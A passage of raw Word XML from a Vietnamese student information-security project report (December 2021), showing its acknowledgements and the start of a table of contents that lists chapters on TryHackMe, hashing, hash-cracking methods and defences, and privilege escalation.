        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D71D6D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_heading=h.3dy6vkm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LỜI CẢM ƠN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7590A4A7" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA" w:rsidP="007949BF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sau quá trình học tập và rèn luyện tại khoa Công nghệ thông tin trường Đại học Sư Phạm Kỹ Thuật, chúng em đã được trang bị các kiến thức cơ bản, các kỹ năng thực tế để có thể hoàn thành đồ án môn học của mình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49099480" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="567"/>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r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>Chúng em xin gửi lời cảm ơn chân thành đến cô Nguyễn Thị Thanh Vân giảng viên trường Đại học Sư phạm Kỹ thuật thành phố Hồ Chí Minh đã quan tâm hướng dẫn truyền đạt những kiến thức và kinh nghiệm cho chúng em trong thời gian học tập bộ môn An toàn thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F92D9D4" w14:textId="5C106CDB" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="567"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Trong quá trình làm đồ án không tránh khỏi được những sai sót, chúng em mong nhận được sự góp ý của </w:t>
      </w:r>
      <w:r w:rsidR="00B66CA8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">cô </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">và các </w:t>
      </w:r>
      <w:r w:rsidR="00B66CA8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>bạn</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> để được hoàn thiện hơn.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a0"/>
        <w:tblW w:w="9972" w:type="dxa"/>
        <w:tblInd w:w="98" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4658"/>
        <w:gridCol w:w="5314"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w14:paraId="4F951F84" w14:textId="77777777" w:rsidTr="00C97D8D">
        <w:trPr>
          <w:trHeight w:val="862"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4658" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0FBB6000" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="567"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5314" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="225EAC81" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="4530"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="250C95CD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="4530"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C97D8D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>TP.Hồ Chí Minh, tháng 12 năm 2021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EDB9124" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="785C10B4" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7EF9C8B1" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w14:paraId="2B66AD75" w14:textId="77777777" w:rsidTr="00C97D8D">
        <w:trPr>
          <w:trHeight w:val="862"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4658" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="26E6F67A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="567"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5314" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="058A72E7" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="567"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D193B6C" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>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ab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6286DC" w14:textId="2975B77D" w:rsidR="006F1FD5" w:rsidRPr="003C65F8" w:rsidRDefault="001F7EFA" w:rsidP="003C65F8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:id w:val="1004397524"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="06D11F21" w14:textId="4463D4A2" w:rsidR="003C65F8" w:rsidRPr="00640CC0" w:rsidRDefault="003C65F8" w:rsidP="003C65F8">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:cstheme="majorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00640CC0">
            <w:rPr>
              <w:rFonts w:cstheme="majorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:t>MỤC LỤC</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6D2DCE60" w14:textId="6790A071" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="003C65F8">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="vi-VN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00640CC0">
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00640CC0">
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00640CC0">
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc90050718" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>CHƯƠNG 1: GIỚI THIỆU CUỘC THI</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18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1</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11533BA1" w14:textId="526C01B3" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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19" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>1.1. Tryhackme là gì</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19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1</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4123419E" w14:textId="2DA65138" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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20" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>1.2. Lịch sử hình thành</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20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1</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="009911BC" w14:textId="09E4723A" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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21" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>1.3. Môi trường đào tạo.</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21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1</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B4A09C7" w14:textId="15EF7759" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="vi-VN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc90050722" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>CHƯƠNG 2: CƠ SỞ LÝ THUYẾT ÁP DỤNG</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22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w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3265DEC7" w14:textId="264CA9AA" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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23" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.1. Hashing</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23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w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09204237" w14:textId="5E3D8CA5"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24" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.1.1. Khái niệm hashing</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24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w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3598DF82" w14:textId="6F3FCCAD"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25" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.1.2. Tính chất</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25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w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44C33DCE" w14:textId="609A4C15"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26" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.1.3. Ứng dụng</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26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3</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1126D338" w14:textId="031B1F73"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27" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.1.4. Hashing với Linux</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27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3</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1981B47B" w14:textId="07493CA0"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28" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.1.5. Các hình thức hash cracking phổ biến</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28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5</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FF5A1CF" w14:textId="461E6364"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29" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.1.6. Cách phòng chống hash cracking</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29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7</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D4D54D9" w14:textId="605181FF" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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30" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.2. Leo thang đặc quyền</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30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8</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
